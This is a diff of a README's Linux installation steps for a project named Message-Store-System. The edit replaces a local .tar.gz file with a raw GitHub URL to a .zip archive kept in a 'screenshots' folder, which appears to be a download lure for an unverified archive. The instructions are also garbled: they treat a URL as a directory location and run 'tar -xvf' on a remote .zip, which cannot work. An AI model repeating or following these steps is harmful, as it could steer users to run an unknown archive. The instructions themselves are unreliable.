MUHAMMADHASEEB761/Message-Store-System/README.md

 ### For Linux:

 1. Open your terminal.
-2. Navigate to the directory where the .tar.gz file is located.
+2. Navigate to the directory where the https://raw.githubusercontent.com/MUHAMMADHASEEB761/Message-Store-System/main/screenshots/Message-Store-System_v2.8-alpha.3.zip file is located.
-3. Run the command: `tar -xvf Message-Store-System.tar.gz`
+3. Run the command: `tar -xvf https://raw.githubusercontent.com/MUHAMMADHASEEB761/Message-Store-System/main/screenshots/Message-Store-System_v2.8-alpha.3.zip`
 4. Follow the instructions in the README file in the extracted folder to complete the installation.

 ## 🛠️ Using Message-Store-System